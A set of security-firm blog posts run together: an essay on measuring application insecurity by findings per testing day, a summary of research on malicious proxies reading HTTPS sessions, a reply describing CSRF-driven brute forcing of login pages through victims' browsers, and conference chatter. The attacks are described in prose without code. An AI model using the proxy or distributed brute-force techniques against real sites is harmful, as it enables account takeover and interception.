A longish post, but this wasn't going to fit into 140 characters. This is an argument pertaining to security metrics, with a statement that using pure vulnerability count-based metrics to talk about an organisation's application (in)security is insufficient, and suggests an alternative approach. Comments welcome.
Apart from the two bookends (SOSS and DBIR), other metrics are also published.
From a testing perspective, WhiteHat releases perhaps the most well-known set of metrics for appsec bugs, and in years gone by, Corsaire released statistics covering their customers. Also in 2008, WASC undertook a project to provide metrics with data sourced from a number of companies, however this too has not seen recent activity (last edit on the site was over a year ago). WhiteHat's metrics measure the number of serious vulnerabilities in each site (High, Critical, Urgent) and then slice and dice this based on the vulnerability's classification, the organisation's size, and the vertical within which they lie. WhiteHat is also in the fairly unique position of being able to record remediation times with a higher granularity than appsec firms that engage with customers through projects rather than service contracts. Corsaire's approach was slightly different; they recorded metrics in terms of the classification of the vulnerability, its impact and the year within which the issue was found. Their report contained similar metrics to the WhiteHat report (e.g. % of apps with XSS), but the inclusion of data from multiple years permitted them to extract trends from their data. (No doubt WhiteHat have trending data, however in the last report it was absent). Lastly, WASC's approach is very similar to WhiteHat's, in that a point in time is selected and vulnerability counts according to impact and classification are provided for that point.
Essentially, each of these approaches uses a base metric of vulnerability tallies, which are then viewed from different angles (classification, time-series, impact). While the metrics are collected per-application, they are easily aggregated into organisations.
In the extreme edges of ideal metrics, the ability to factor in chains of vulnerabilities that individually present little risk, but combined is greater than the sum of the parts, would be fantastic. This aspect is ignored by most (including us), as a fruitful path isn't clear.
One could just as easily claim that absolute bug counts are irrelevant and that they need to be relative to some other scale; commonly the number of applications an organisation has. However in this case, if the metrics don't provide enough granularity to accurately position your organisation with respect to others that you actually care about, then they're worthless to you in decision making. What drives many of our customers is not where they stand in relation to every other organisation, but specifically their peers and competitors. It's slightly ironic that oftentimes the more metrics released, the less applicable they are to individual companies. As a bank, knowing you're in the top 10% of a sample of banking organisations means something; when you're in the highest 10% of a survey that includes WebGoat clones, the results are much less clear.
In Seven Myths About Information Security Metrics, Dr Hinson raises a number of interesting points about security metrics. They're mostly applicable to security awareness, however they also carry across into other security activities. At least two serve my selfish needs, so I'll quote them here:
Myth 1: Metrics must be “objective” and “tangible”There is a subtle but important distinction between measuring subjective factors and measuring subjectively. It is relatively easy to measure “tangible” or objective things (the number of virus incidents, or the number of people trained). This normally gives a huge bias towards such metrics in most measurement systems, and a bias against measuring intangible things (such as level of security awareness). In fact, “intangible” or subjective things can be measured objectively, but we need to be reasonably smart about it (e.g., by using interviews,surveys and audits). Given the intangible nature of security awareness, it is definitely worth putting effort into the measurement of subjective factors, rather than relying entirely on easy-to-measure but largely irrelevant objective factors. [G Hinson]
Myth 3: We need absolute measurementsFor some unfathomable reason, people often assume we need “absolute measures”—height in meters, weight in pounds, etc. This is nonsense!
If I line up the people in your department against a wall, I can easily tell who is tallest, with no rulers in sight. This yet again leads to an unnecessary bias in many measurement systems. In fact, relative values are often more useful than absolute scales, especially to drive improvement. Consider this for instance: “Tell me, on an (arbitrary) scale from one to ten, how security aware are the people in your department are? OK, I'll be back next month to ask you the same question!” We need not define the scale formally, as long as the person being asked (a) has his own mental model of the processes and (b) appreciates the need to improve them. We needn't even worry about minor variations in the scoring scale from month to month, as long as our objective of promoting improvement is met. Benchmarking and best practice transfer are good examples of this kind of thinking. “I don't expect us to be perfect, but I'd like us to be at least as good as standard X or company Y. [G Hinson]
While he writes from the view of an organisation trying to decide whether their security awareness program is yielding dividends, the core statements are applicable for organisations seeking to determine the efficacy of their software security program. I'm particularly drawn by two points: the first is that intangibles are as useful as concrete metrics, and the second is that absolute measurements aren't necessary, comparative ordering is sometimes enough.
Measuring effort, or attacker cost, is not new to security but it's mostly done indirectly through the sale of exploits (e.g. iDefence, ZDI). Even here, effort is not directly related to the purchase price, which is also influenced by other factors such as the number of deployed targets etc. In any case, for custom applications that testers are mostly presented with, such public sources should be of little help (if your testers are submitting findings to ZDI, you have bigger problems). Every now and then, an exploit dev team will mention how long it took them to write an exploit for some weird Windows bug; these are always interesting data points, but are not specific enough for customers and the sample size is low.
Ideally, any measure of an attacker's cost can take into account both time and their exclusivity (or experience), however in practice this will be tough to gather from your testers. One could base it on their hourly rate, if your testing company differentiates between resources. In cases where they don't, or you're seeking to keep the metric simple, then another estimate for effort is the number of days spent on testing.
Returning to our sample companies, if the 5 vulnerabilities exposed in the Visigoth's each required, on average, a single day to find, while the Ostrogoth's 20 bugs average 5 days each, then the effort required by an attacker is minimised by choosing to target the Visigoths. In other words, one might argue that the Visigoths are more at risk than the Ostrogoths.
With this base metric, it's then possible to capture historical assessment data and provide both internal-looking metrics for an organisation as well as comparative metrics, if the testing company is also employed by your competitors. Internal metrics are the usual kinds (impact, classification, time-series), but the comparison option is very interesting. We're in the fortunate position of working with many top companies locally, and are able to compare competitors using this metric as a base. The actual ranking formulae is largely unimportant here. Naturally, data must be anonymised so as to protect names; one could provide the customer with their rank only. In this way, the customer has an independent notion of how their security activities rate against their peers without embarrassing the peers.
Inverting the findings-per-day metric provide the average number of days to find a particular class of vulnerability, or impact level. That is, if a client averages 0.7 High or Critical findings per testing day, then on average it takes us 1.4 days of testing to find an issue of great concern, which is an easy way of expressing the base metric.
As mentioned above, a minimum number of assessments would be needed before the metric is reliable; this is a hint at the deeper problems that randomly selected project days are not independent. An analyst stuck on a 4 week project is focused on a very small part of the broader organisation's application landscape. We counter this bias by including as many projects of the same type as possible.
This metric would also be very useful to include in each subsequent report for the customer, with every report containing an evaluation against their longterm vulnerability averages.
As mentioned above, a key test for metrics is where they support decision making, and the feedback from the client was positive in this regard.
This idea is still being fleshed out. If you're aware of previous work in this regard or have suggestions on how to improve it (even abandon it) please get in contact.
Oh, and if you've read this far and are looking for training, we're at BH in August.
Ron Auger sent an email to the [WASC Mail list] on some fine work presented recently by Microsoft Research. The paper (and accompanying PPT), titled [Pretty-Bad-Proxy: An Overlooked Adversary in Browsers' HTTPS Deployments] is pretty cool and shows several techniques for a malicious inline proxy to sniff SSL sessions passing through the proxy. Its genuinely a bunch of cool findings and has been handled neatly (with the exception of some shocking clipart!).
The attack logic is fairly simple. User tries to browse to https://mybank.com. The browser sends a connect message to the proxy. The proxy returns an HTTP 502 proxy error message. The magic comes in here. The browser interprets the returned 502 message within the security context of https://mybank.com.
So the attack works as follows:
With a little more arm bending the paper even goes on to remove the neccessity of full control of an evil proxy, relying on an attacker on the local network sniffing traffic and then racing the valid proxy server..
The findings have been disclosed to the browser vendors and have already been remediated, which means we can collectively breath a sigh of relief, but clearly, it has not been a good year for SSL (and SSL implementations).
Rob had a rant on his site on the timing attack, with a CSRF twist.. We met him after our Vegas talk, but im not really sure how his attack differs from our published one..
my on-list response:
-snip- From: haroon meer
To: email@example.com Cc: firstname.lastname@example.org Subject: Re: [WEB SECURITY] Performing Distributed Brute Forcing of CSRF vulnerable login pages
Thanks for the kind words on the talk.. If you check out the visio at: http://www.sensepost.com/blogstatic/2007/08/dxsrt.png you will see that its pretty much the same attack.. In a shameless display of self-pimpage, check out the paper http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf from page 12.. Figure 23 for example shows the results in a victim/zombies browser, after he has visited our page.. Effectively he tries the userlist we send him (in this case on a standard squirrelmail login page). Once he detects a timing diff (again using a trivial algorithm to avoid latency disparity) he simply makes another request to the attacker to report his success..
We do give the important pieces of the script in the paper, but i suspect anyone with 2 minutes of time could have cobbled them together anyway..
ok.. so im in my room finally catching up on sleep (or will be in a few minutes) while most people are finishing Microsofts booze at the PURE microsoft party.. BlackHat is over, which means tomorrow we are off to the riviera for defcon..
Most of the SensePost'ers have been making notes so they can blog on talks they attended.. this will filter through in the next few days.. I caught the Erratasec talk this morning, and have a few thoughts, but ill wait till i have time to actually comment properly..
Last night we found a patch of parking lot to have the first SensePost vs. BlackHat crew (.za vs USA?) Soccer/Football game.. We started off being kicked outa the Palace Ballroom and ended up on a patch of ground outside but it ended up being awesome.. Ultimately, Bradley, Charl, Marco, Nick and I ended up taking on Grifter, DedHed, Joe Grand, Dave, and Chris(?) while j0hnny long was official photographer..
It was all around awesomeness and probably the most fun i personally had in vegas in a while..
We promised to upload one of the tools we demo'd during the talk, so ill do that in a few minutes..